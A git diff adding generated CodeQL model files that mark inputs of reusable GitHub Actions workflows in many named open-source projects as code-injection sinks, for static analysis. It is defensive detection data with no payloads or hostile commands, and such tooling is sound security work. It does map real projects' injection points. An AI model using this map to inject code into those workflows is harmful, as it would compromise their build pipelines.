diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml new file mode 100644 index 000000000000..6a578723d865 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml new file mode 100644 index 000000000000..14afd31d1524 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "input.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "input.matrix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml new file mode 100644 index 000000000000..772dd2e7c713 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "input.arch", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml new file mode 100644 index 000000000000..477e782dde65 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml new file mode 100644 index 000000000000..4d66b2854034 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml new file mode 100644 index 000000000000..8bd5aacbd9b0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml new file mode 100644 index 000000000000..cd1933d8a235 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "input.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 000000000000..9e1b26e1a293 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml new file mode 100644 index 000000000000..4977c1d98817 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml new file mode 100644 index 000000000000..2fa4322aff4c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml new file mode 100644 index 000000000000..5f90523e8335 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_build_type", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml new file mode 100644 index 000000000000..9ffbce337f49 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml new file mode 100644 index 000000000000..2182d445b831 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml new file mode 100644 index 000000000000..1928629382d5 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml new file mode 100644 index 000000000000..59f7022fd895 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml new file mode 100644 index 000000000000..f2e55b0dc5e3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml new file mode 100644 index 000000000000..f92cfbba9c59 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml new file mode 100644 index 000000000000..09318cf02bb7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml new file mode 100644 index 000000000000..48a3258e7a8a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml new file mode 100644 index 000000000000..cc8afde9d6a1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml new file mode 100644 index 000000000000..2960e471d2e3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "input.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml new file mode 100644 index 000000000000..a4f095a23592 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml new file mode 100644 index 000000000000..cba130336692 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_types", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "input.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml new file mode 100644 index 000000000000..3fa02372683c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "input.board", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml new file mode 100644 index 000000000000..d31c7ee78044 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml new file mode 100644 index 000000000000..a270324f866d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml new file mode 100644 index 000000000000..58dc1dd30af3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml new file mode 100644 index 000000000000..7255b0fa879a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml new file mode 100644 index 000000000000..b2aacde75df2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml new file mode 100644 index 000000000000..4bc1aec46a25 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml new file mode 100644 index 000000000000..1309dc357a2d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.reactNativeWindowsVersion", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml new file mode 100644 index 000000000000..a76e015ab89a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml new file mode 100644 index 000000000000..b9da0f85225b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml new file mode 100644 index 000000000000..99e2d783c66b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml new file mode 100644 index 000000000000..cef0c9134aa7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml 
